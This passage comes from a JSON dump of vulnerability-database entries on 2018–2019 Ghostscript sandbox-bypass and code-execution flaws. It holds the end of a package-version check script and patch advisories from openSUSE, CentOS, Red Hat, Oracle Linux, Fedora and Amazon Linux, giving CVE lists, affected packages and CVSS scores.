\"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRTARM64-3\\.0\\.1\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1384\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1384\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'ghostscript' package(s) announced via the EulerOS-SA-2019-1384 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"An issue was discovered in Artifex Ghostscript before 9.26. LockSafetyParams is not checked correctly if another device is used.(CVE-2018-19409)\n\nIn Artifex Ghostscript 9.23 before 2018-08-24, attackers able to supply crafted PostScript could use uninitialized memory access in the aesdecode operator to crash the interpreter or potentially execute code.(CVE-2018-15911)\n\nIn Artifex Ghostscript before 9.24, attackers able to supply crafted PostScript files could use incorrect free logic in pagedevice replacement to crash the interpreter.(CVE-2018-16541)\n\nAn issue was discovered in Artifex Ghostscript before 9.25. Incorrect 'restoration of privilege' checking when running out of stack during exception handling could be used by attackers able to supply crafted PostScript to execute code using the 'pipe' instruction. This is due to an incomplete fix for CVE-2018-16509.(CVE-2018-16802)\n\nArtifex Ghostscript before 9.25 allowed a user-writable error exception table, which could be used by remote attackers able to supply crafted PostScript to potentially overwrite or replace error handlers to inject code.(CVE-2018-17183)\n\nArtifex Ghostscript allows attackers to bypass a sandbox protection mechanism by leveraging exposure of system operators in the saved execution stack in an error object.(CVE-2018-18073)\n\nArtifex Ghostscript 9.25 and earlier allows attackers to bypass a sandbox protection mechanism via vectors involving the 1Policy operator.(CVE-2018-18284)\n\nArtifex Ghostscript 9.25 and earlier allows attackers to bypass a sandbox protection mechanism via vectors involving errorhandler setup. NOTE: this issue exists because of an incomplete fix for CVE-2018-17183.(CVE-2018-17961)\n\nIn Artifex Ghostscript through 9.25, the setpattern operator did not properly validate certain types. A specially crafted PostScript document could exploit this to crash Ghostscript or, possibly, execute arbitrary code in the context of the Ghostscript process. This is a type confusion issue because of failure to check whether the Implementation of a pattern dictionary was a structure type.(CVE-2018-19134)\");\n\n script_tag(name:\"affected\", value:\"'ghostscript' package(s) on Huawei EulerOS Virtualization for ARM 64 3.0.1.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRTARM64-3.0.1.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"ghostscript\", rpm:\"ghostscript~9.07~31.6.h5\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2018-12-15T15:38:37", "bulletinFamily": "unix", "cvelist": ["CVE-2018-17961", "CVE-2018-18073", "CVE-2018-17183", "CVE-2018-19476", "CVE-2018-18284", "CVE-2018-19477", "CVE-2018-19475", "CVE-2018-19409"], "description": "This update for ghostscript to version 9.26 fixes the following issues:\n\n Security issues fixed:\n\n - CVE-2018-19475: Fixed bypass of an intended access restriction in\n psi/zdevice2.c (bsc#1117327)\n - CVE-2018-19476: Fixed bypass of an intended access restriction in\n psi/zicc.c (bsc#1117313)\n - CVE-2018-19477: Fixed bypass of an intended access restriction in\n psi/zfjbig2.c (bsc#1117274)\n - CVE-2018-19409: Check if another device is used correctly in\n LockSafetyParams (bsc#1117022)\n - CVE-2018-18284: Fixed potential sandbox escape through 1Policy operator\n (bsc#1112229)\n - CVE-2018-18073: Fixed leaks through operator in saved execution stacks\n (bsc#1111480)\n - CVE-2018-17961: Fixed a -dSAFER sandbox escape by bypassing executeonly\n (bsc#1111479)\n - CVE-2018-17183: Fixed a potential code injection by specially crafted\n PostScript files (bsc#1109105)\n\n Version update to 9.26 (bsc#1117331):\n\n - Security issues have been the primary focus\n - Minor bug fixes and improvements\n - For release summary see: <a rel=\"nofollow\" href=\"http://www.ghostscript.com/doc/9.26/News.htm\">http://www.ghostscript.com/doc/9.26/News.htm</a>\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n", "edition": 1, "modified": "2018-12-15T12:10:58", "published": "2018-12-15T12:10:58", "id": "OPENSUSE-SU-2018:4138-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-12/msg00037.html", "title": "Security update for ghostscript (important)", "type": "suse", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-12-15T15:38:36", "bulletinFamily": "unix", "cvelist": ["CVE-2018-17961", "CVE-2018-18073", "CVE-2018-17183", "CVE-2018-19476", "CVE-2018-18284", "CVE-2018-19477", "CVE-2018-19475", "CVE-2018-19409"], "description": "This update for ghostscript to version 9.26 fixes the following issues:\n\n Security issues fixed:\n\n - CVE-2018-19475: Fixed bypass of an intended access restriction in\n psi/zdevice2.c (bsc#1117327)\n - CVE-2018-19476: Fixed bypass of an intended access restriction in\n psi/zicc.c (bsc#1117313)\n - CVE-2018-19477: Fixed bypass of an intended access restriction in\n psi/zfjbig2.c (bsc#1117274)\n - CVE-2018-19409: Check if another device is used correctly in\n LockSafetyParams (bsc#1117022)\n - CVE-2018-18284: Fixed potential sandbox escape through 1Policy operator\n (bsc#1112229)\n - CVE-2018-18073: Fixed leaks through operator in saved execution stacks\n (bsc#1111480)\n - CVE-2018-17961: Fixed a -dSAFER sandbox escape by bypassing executeonly\n (bsc#1111479)\n - CVE-2018-17183: Fixed a potential code injection by specially crafted\n PostScript files (bsc#1109105)\n\n Version update to 9.26 (bsc#1117331):\n\n - Security issues have been the primary focus\n - Minor bug fixes and improvements\n - For release summary see: <a rel=\"nofollow\" href=\"http://www.ghostscript.com/doc/9.26/News.htm\">http://www.ghostscript.com/doc/9.26/News.htm</a>\n\n This update was imported from the SUSE:SLE-12:Update update project.\n\n", "edition": 1, "modified": "2018-12-15T12:14:29", "published": "2018-12-15T12:14:29", "id": "OPENSUSE-SU-2018:4140-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-12/msg00038.html", "title": "Security update for ghostscript (important)", "type": "suse", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "centos": [{"lastseen": "2020-12-08T03:35:44", "bulletinFamily": "unix", "cvelist": ["CVE-2018-17961", "CVE-2018-18073", "CVE-2018-17183", "CVE-2018-18284", "CVE-2018-15911", "CVE-2018-19134", "CVE-2018-16802", "CVE-2018-16541", "CVE-2018-19409"], "description": "**CentOS Errata and Security Advisory** CESA-2018:3834\n\n\nThe Ghostscript suite contains utilities for rendering PostScript and PDF documents. Ghostscript translates PostScript code to common bitmap formats so that the code can be displayed or printed.\n\nSecurity Fix(es):\n\n* ghostscript: Incorrect free logic in pagedevice replacement (699664) (CVE-2018-16541)\n\n* ghostscript: Incorrect \"restoration of privilege\" checking when running out of stack during exception handling (CVE-2018-16802)\n\n* ghostscript: User-writable error exception table (CVE-2018-17183)\n\n* ghostscript: Saved execution stacks can leak operator arrays (incomplete fix for CVE-2018-17183) (CVE-2018-17961)\n\n* ghostscript: Saved execution stacks can leak operator arrays (CVE-2018-18073)\n\n* ghostscript: 1Policy operator allows a sandbox protection bypass (CVE-2018-18284)\n\n* ghostscript: Type confusion in setpattern (700141) (CVE-2018-19134)\n\n* ghostscript: Improperly implemented security check in zsetdevice function in psi/zdevice.c (CVE-2018-19409)\n\n* ghostscript: Uninitialized memory access in the aesdecode operator (699665) (CVE-2018-15911)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank Tavis Ormandy (Google Project Zero) for reporting CVE-2018-16541.\n\nBug Fix(es):\n\n* It has been found that ghostscript-9.07-31.el7_6.1 introduced regression during the handling of shading objects, causing a \"Dropping incorrect smooth shading object\" warning. With this update, the regression has been fixed and the described problem no longer occurs. (BZ#1657822)\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2018-December/035172.html\n\n**Affected packages:**\nghostscript\nghostscript-cups\nghostscript-devel\nghostscript-doc\nghostscript-gtk\n\n**Upstream details at:**\n", "edition": 4, "modified": "2018-12-19T03:22:11", "published": "2018-12-19T03:22:11", "id": "CESA-2018:3834", "href": "http://lists.centos.org/pipermail/centos-announce/2018-December/035172.html", "title": "ghostscript security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:44:53", "bulletinFamily": "unix", "cvelist": ["CVE-2018-15911", "CVE-2018-16541", "CVE-2018-16802", "CVE-2018-17183", "CVE-2018-17961", "CVE-2018-18073", "CVE-2018-18284", "CVE-2018-19134", "CVE-2018-19409"], "description": "The Ghostscript suite contains utilities for rendering PostScript and PDF documents. Ghostscript translates PostScript code to common bitmap formats so that the code can be displayed or printed.\n\nSecurity Fix(es):\n\n* ghostscript: Incorrect free logic in pagedevice replacement (699664) (CVE-2018-16541)\n\n* ghostscript: Incorrect \"restoration of privilege\" checking when running out of stack during exception handling (CVE-2018-16802)\n\n* ghostscript: User-writable error exception table (CVE-2018-17183)\n\n* ghostscript: Saved execution stacks can leak operator arrays (incomplete fix for CVE-2018-17183) (CVE-2018-17961)\n\n* ghostscript: Saved execution stacks can leak operator arrays (CVE-2018-18073)\n\n* ghostscript: 1Policy operator allows a sandbox protection bypass (CVE-2018-18284)\n\n* ghostscript: Type confusion in setpattern (700141) (CVE-2018-19134)\n\n* ghostscript: Improperly implemented security check in zsetdevice function in psi/zdevice.c (CVE-2018-19409)\n\n* ghostscript: Uninitialized memory access in the aesdecode operator (699665) (CVE-2018-15911)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank Tavis Ormandy (Google Project Zero) for reporting CVE-2018-16541.\n\nBug Fix(es):\n\n* It has been found that ghostscript-9.07-31.el7_6.1 introduced regression during the handling of shading objects, causing a \"Dropping incorrect smooth shading object\" warning. With this update, the regression has been fixed and the described problem no longer occurs. (BZ#1657822)", "modified": "2018-12-17T23:51:46", "published": "2018-12-17T23:48:48", "id": "RHSA-2018:3834", "href": "https://access.redhat.com/errata/RHSA-2018:3834", "type": "redhat", "title": "(RHSA-2018:3834) Important: ghostscript security and bug fix update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:36:17", "bulletinFamily": "unix", "cvelist": ["CVE-2018-17961", "CVE-2018-18073", "CVE-2018-17183", "CVE-2018-18284", "CVE-2018-15911", "CVE-2018-19134", "CVE-2018-16802", "CVE-2018-16541", "CVE-2018-19409"], "description": "[9.07-31.el7_6.6]\n- Resolves: #1657822 - ghostscript: Regression: Warning: Dropping incorrect\n smooth shading object (Error: /rangecheck in --run--)\n[9.07-31.el7_6.5]\n- Resolves: #1654621 - CVE-2018-16541 ghostscript: incorrect free logic in\n pagedevice replacement (699664)\n- Resolves: #1650210 - CVE-2018-17183 ghostscript: User-writable error\n exception table\n- Resolves: #1645516 - CVE-2018-18073 ghostscript: saved execution stacks\n can leak operator arrays\n- Resolves: #1648891 - CVE-2018-17961 ghostscript: saved execution stacks\n can leak operator arrays (incomplete fix for CVE-2018-17183)\n- Resolves: #1643115 - CVE-2018-18284 ghostscript: 1Policy operator\n allows a sandbox protection bypass\n- Resolves: #1655937 - CVE-2018-19134 ghostscript: Type confusion in\n setpattern (700141)\n[9.07-31.el7_6.4]\n- Resolves: #1651149 - CVE-2018-15911 ghostscript: uninitialized memory\n access in the aesdecode operator (699665)\n- Resolves: #1650060 - CVE-2018-16802 ghostscript: Incorrect 'restoration of\n privilege' checking when running out of stack during exception handling\n- Resolves: #1652935 - CVE-2018-19409 ghostscript: Improperly implemented\n security check in zsetdevice function in psi/zdevice.c", "edition": 3, "modified": "2018-12-18T00:00:00", "published": "2018-12-18T00:00:00", "id": "ELSA-2018-3834", "href": "http://linux.oracle.com/errata/ELSA-2018-3834.html", "title": "ghostscript security and bug fix update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-14T08:38:41", "bulletinFamily": "unix", "cvelist": ["CVE-2018-17961", "CVE-2019-3835", "CVE-2018-18073", "CVE-2018-15908", "CVE-2018-17183", "CVE-2019-3839", "CVE-2018-19476", "CVE-2018-16540", "CVE-2018-18284", "CVE-2018-15911", "CVE-2018-19134", "CVE-2018-11645", "CVE-2018-19477", "CVE-2018-16802", "CVE-2018-16511", "CVE-2018-16541", "CVE-2018-16863", "CVE-2018-16539", "CVE-2018-19475", "CVE-2018-16509", "CVE-2018-19409", "CVE-2018-15909", "CVE-2019-3838", "CVE-2019-6116"], "description": "[9.25-2]\n- obsoleted old ghostscript-devel to allow clean upgrade to libgs-devel\n[9.25-1]\n- Rebase to latest upstream version (bug #1636115)\n- Resolves: #1673399 - CVE-2019-3839 ghostscript: missing attack vector\n protections for CVE-2019-6116\n- Resolves: #1678172 - CVE-2019-3835 ghostscript: superexec operator\n is available (700585)\n- Resolves: #1680026 - CVE-2019-3838 ghostscript: forceput in DefineResource\n is still accessible (700576)\n- Resolves: #1670443 - ghostscript: Regression: double comment chars\n '%' in gs_init.ps leading to missing metadata\n- fix for pdf2dsc regression added to allow fix for CVE-2019-3839\n[9.07-32]\n- Remove as many non-standard operators as possible to make the codebase\n closer to upstream for later CVEs\n- Resolves: #1621385 - CVE-2018-16511 ghostscript: missing type check in type\n checker (699659)\n- Resolves: #1649722 - CVE-2018-16539 ghostscript: incorrect access checking\n in temp file handling to disclose contents of files (699658)\n- Resolves: #1621162 - CVE-2018-15908 ghostscript: .tempfile file permission\n issues (699657)\n- Resolves: #1621384 - CVE-2018-15909 ghostscript: shading_param incomplete\n type checking (699660)\n- Resolves: #1652902 - CVE-2018-16863 ghostscript: incomplete fix for\n CVE-2018-16509\n- Resolves: #1654045 ghostscript update breaks xdvi (gs: Error: /undefined in flushpage)\n- Resolves: #1651150 - CVE-2018-15911 ghostscript: uninitialized memory\n access in the aesdecode operator (699665)\n- Resolves: #1650061 - CVE-2018-16802 ghostscript: Incorrect 'restoration of\n privilege' checking when running out of stack during exception handling\n- Resolves: #1652936 - CVE-2018-19409 ghostscript: Improperly implemented\n security check in zsetdevice function in psi/zdevice.c\n- Resolves: #1654622 - CVE-2018-16541 ghostscript: incorrect free logic in\n pagedevice replacement (699664)\n- Resolves: #1650211 - CVE-2018-17183 ghostscript: User-writable error\n exception table\n- Resolves: #1645517 - CVE-2018-18073 ghostscript: saved execution stacks\n can leak operator arrays\n- Resolves: #1648892 - CVE-2018-17961 ghostscript: saved execution stacks\n can leak operator arrays (incomplete fix for CVE-2018-17183)\n- Resolves: #1643117 - CVE-2018-18284 ghostscript: 1Policy operator\n allows a sandbox protection bypass\n- Resolves: #1655939 - CVE-2018-19134 ghostscript: Type confusion in\n setpattern (700141)\n- Resolves: #1657694 - ghostscript: Regression: Warning: Dropping incorrect\n smooth shading object (Error: /rangecheck in --run--)\n- Resolves: #1661210 pdf2ps reports an error when reading from stdin\n- Resolves: #1657334 - CVE-2018-16540 ghostscript: use-after-free in\n copydevice handling (699661)\n- Resolves: #1660570 - CVE-2018-19475 ghostscript: access bypass in\n psi/zdevice2.c (700153)\n- Resolves: #1660829 - CVE-2018-19476 ghostscript: access bypass in\n psi/zicc.c\n- Resolves: #1661279 - CVE-2018-19477 ghostscript: access bypass in\n psi/zfjbig2.c (700168)\n- Resolves: #1667443 - CVE-2019-6116 ghostscript: subroutines within\n pseudo-operators must themselves be pseudo-operators\n- Resolves: #1670443 - ghostscript: Regression: double comment chars\n '%' in gs_init.ps leading to missing metadata", "edition": 1, "modified": "2019-08-13T00:00:00", "published": "2019-08-13T00:00:00", "id": "ELSA-2019-2281", "href": "http://linux.oracle.com/errata/ELSA-2019-2281.html", "title": "ghostscript security, bug fix, and enhancement update", "type": "oraclelinux", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2018-17183", "CVE-2018-17961", "CVE-2018-18073", "CVE-2018-18284", "CVE-2018-19134", "CVE-2018-19409", "CVE-2018-19475", "CVE-2018-19476", "CVE-2018-19477", "CVE-2018-19478"], "description": "This package provides useful conversion utilities based on Ghostscript soft ware, for converting PS, PDF and other document formats between each other. Ghostscript is a suite of software providing an interpreter for Adobe Syste ms' PostScript (PS) and Portable Document Format (PDF) page description languag es. Its primary purpose includes displaying (rasterization & rendering) and pri nting of document pages, as well as conversions between different document format s. ", "modified": "2019-02-12T02:58:39", "published": "2019-02-12T02:58:39", "id": "FEDORA:3B20860F60C5", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 29 Update: ghostscript-9.26-1.fc29", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10194", "CVE-2018-16802", "CVE-2018-17183", "CVE-2018-17961", "CVE-2018-18073", "CVE-2018-18284", "CVE-2018-19134", "CVE-2018-19409", "CVE-2018-19475", "CVE-2018-19476", "CVE-2018-19477", "CVE-2018-19478"], "description": "This package provides useful conversion utilities based on Ghostscript soft ware, for converting PS, PDF and other document formats between each other. Ghostscript is a suite of software providing an interpreter for Adobe Syste ms' PostScript (PS) and Portable Document Format (PDF) page description languag es. Its primary purpose includes displaying (rasterization & rendering) and pri nting of document pages, as well as conversions between different document format s. ", "modified": "2019-02-18T01:27:21", "published": "2019-02-18T01:27:21", "id": "FEDORA:126AB6056F14", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: ghostscript-9.26-1.fc28", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "amazon": [{"lastseen": "2021-02-20T03:27:33", "bulletinFamily": "unix", "cvelist": ["CVE-2018-17961", "CVE-2019-3835", "CVE-2018-18073", "CVE-2019-14869", "CVE-2018-17183", "CVE-2019-3839", "CVE-2018-19476", "CVE-2018-18284", "CVE-2018-19134", "CVE-2019-14811", "CVE-2019-14817", "CVE-2018-19477", "CVE-2019-14812", "CVE-2019-14813", "CVE-2018-19475", "CVE-2018-19409", "CVE-2019-3838", "CVE-2019-6116"], "description": "**Issue Overview:**\n\nArtifex Ghostscript before 9.25 allowed a user-writable error exception table, which could be used by remote attackers able to supply crafted PostScript to potentially overwrite or replace error handlers to inject code. ([CVE-2018-17183 __](<https://access.redhat.com/security/cve/CVE-2018-17183>))\n\nArtifex Ghostscript 9.25 and earlier allows attackers to bypass a sandbox protection mechanism via vectors involving errorhandler setup. NOTE: this issue exists because of an incomplete fix for [CVE-2018-17183 __](<https://access.redhat.com/security/cve/CVE-2018-17183>). ([CVE-2018-17961 __](<https://access.redhat.com/security/cve/CVE-2018-17961>))\n\nArtifex Ghostscript allows attackers to bypass a sandbox protection mechanism by leveraging exposure of system operators in the saved execution stack in an error object. ([CVE-2018-18073 __](<https://access.redhat.com/security/cve/CVE-2018-18073>))\n\nArtifex Ghostscript 9.25 and earlier allows attackers to bypass a sandbox protection mechanism via vectors involving the 1Policy operator. ([CVE-2018-18284 __](<https://access.redhat.com/security/cve/CVE-2018-18284>))\n\nIn Artifex Ghostscript through 9.25, the setpattern operator did not properly validate certain types. A specially crafted PostScript document could exploit this to crash Ghostscript or, possibly, execute arbitrary code in the context of the Ghostscript process. This is a type confusion issue because of failure to check whether the Implementation of a pattern dictionary was a structure type. ([CVE-2018-19134 __](<https://access.redhat.com/security/cve/CVE-2018-19134>))\n\nAn issue was discovered in Artifex Ghostscript before 9.26. LockSafetyParams is not checked correctly if another device is used. ([CVE-2018-19409 __](<https://access.redhat.com/security/cve/CVE-2018-19409>))\n\npsi/zdevice2.c in Artifex Ghostscript before 9.26 allows remote attackers to bypass intended access restrictions because available stack space is not checked when the device remains the same. ([CVE-2018-19475 __](<https://access.redhat.com/security/cve/CVE-2018-19475>))\n\npsi/zicc.c in Artifex Ghostscript before 9.26 allows remote attackers to bypass intended access restrictions because of a setcolorspace type confusion. ([CVE-2018-19476 __](<https://access.redhat.com/security/cve/CVE-2018-19476>))\n\npsi/zfjbig2.c in Artifex Ghostscript before 9.26 allows remote attackers to bypass intended access restrictions because of a JBIG2Decode type confusion. ([CVE-2018-19477 __](<https://access.redhat.com/security/cve/CVE-2018-19477>))\n\nA flaw was found in the .pdf_hook_DSC_Creator procedure where it did not properly secure its privileged calls, enabling scripts to bypass `-dSAFER` restrictions. A specially crafted PostScript file could disable security protection and then have access to the file system, or execute arbitrary commands. ([CVE-2019-14811 __](<https://access.redhat.com/security/cve/CVE-2019-14811>))\n\nA flaw was found in the .setuserparams2 procedure where it did not properly secure its privileged calls, enabling scripts to bypass `-dSAFER` restrictions. A specially crafted PostScript file could disable security protection and then have access to the file system, or execute arbitrary commands. ([CVE-2019-14812 __](<https://access.redhat.com/security/cve/CVE-2019-14812>))\n\nA flaw was found in the setsystemparams procedure where it did not properly secure its privileged calls, enabling scripts to bypass `-dSAFER` restrictions. A specially crafted PostScript file could disable security protection and then have access to the file system, or execute arbitrary commands. ([CVE-2019-14813 __](<https://access.redhat.com/security/cve/CVE-2019-14813>))\n\nA flaw was found in the .pdfexectoken and other procedures where it did not properly secure its privileged calls, enabling scripts to bypass `-dSAFER` restrictions. A specially crafted PostScript file could disable security protection and then have access to the file system, or execute arbitrary commands. ([CVE-2019-14817 __](<https://access.redhat.com/security/cve/CVE-2019-14817>))\n\nA flaw was found in the `.charkeys` procedure, where it did not properly secure its privileged calls, enabling scripts to bypass `-dSAFER` restrictions. An attacker could abuse this flaw by creating a specially crafted PostScript file that could escalate privileges within the Ghostscript and access files outside of restricted areas or execute commands. ([CVE-2019-14869 __](<https://access.redhat.com/security/cve/CVE-2019-14869>))\n\nIt was found that the superexec operator was available in the internal dictionary. A specially crafted PostScript file could use this flaw in order to, for example, have access to the file system outside of the constrains imposed by -dSAFER. ([CVE-2019-3835 __](<https://access.redhat.com/security/cve/CVE-2019-3835>))\n\nIt was found that the forceput operator could be extracted from the DefineResource method. A specially crafted PostScript file could use this flaw in order to, for example, have access to the file system outside of the constrains imposed by -dSAFER. ([CVE-2019-3838 __](<https://access.redhat.com/security/cve/CVE-2019-3838>))\n\nIt was found that some privileged operators remained accessible from various places after the [CVE-2019-6116 __](<https://access.redhat.com/security/cve/CVE-2019-6116>) fix. A specially crafted PostScript file could use this flaw in order to, for example, have access to the file system outside of the constrains imposed by -dSAFER. ([CVE-2019-3839 __](<https://access.redhat.com/security/cve/CVE-2019-3839>))\n\nIt was found that ghostscript could leak sensitive operators on the operand stack when a pseudo-operator pushes a subroutine. A specially crafted PostScript file could use this flaw to escape the -dSAFER protection in order to, for example, have access to the file system outside of the SAFER constraints. ([CVE-2019-6116 __](<https://access.redhat.com/security/cve/CVE-2019-6116>))\n\n \n**Affected Packages:** \n\n\nghostscript\n\n \n**Issue Correction:** \nRun _yum update ghostscript_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n aarch64: \n ghostscript-9.25-5.amzn2.aarch64 \n libgs-9.25-5.amzn2.aarch64 \n libgs-devel-9.25-5.amzn2.aarch64 \n ghostscript-gtk-9.25-5.amzn2.aarch64 \n ghostscript-cups-9.25-5.amzn2.aarch64 \n ghostscript-debuginfo-9.25-5.amzn2.aarch64 \n \n i686: \n ghostscript-9.25-5.amzn2.i686 \n libgs-9.25-5.amzn2.i686 \n libgs-devel-9.25-5.amzn2.i686 \n ghostscript-gtk-9.25-5.amzn2.i686 \n ghostscript-cups-9.25-5.amzn2.i686 \n ghostscript-debuginfo-9.25-5.amzn2.i686 \n \n noarch: \n ghostscript-doc-9.25-5.amzn2.noarch \n \n src: \n ghostscript-9.25-5.amzn2.src \n \n x86_64: \n ghostscript-9.25-5.amzn2.x86_64 \n libgs-9.25-5.amzn2.x86_64 \n libgs-devel-9.25-5.amzn2.x86_64 \n ghostscript-gtk-9.25-5.amzn2.x86_64 \n ghostscript-cups-9.25-5.amzn2.x86_64 \n ghostscript-debuginfo-9.25-5.amzn2.x86_64 \n \n \n", "edition": 1, "modified": "2021-02-17T00:58:00", "published": "2021-02-17T00:58:00", "id": "ALAS2-2021-1598", "href": "https://alas.aws.amazon.com/AL2/ALAS-2021-1598.html", "title": "Important: ghostscript", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}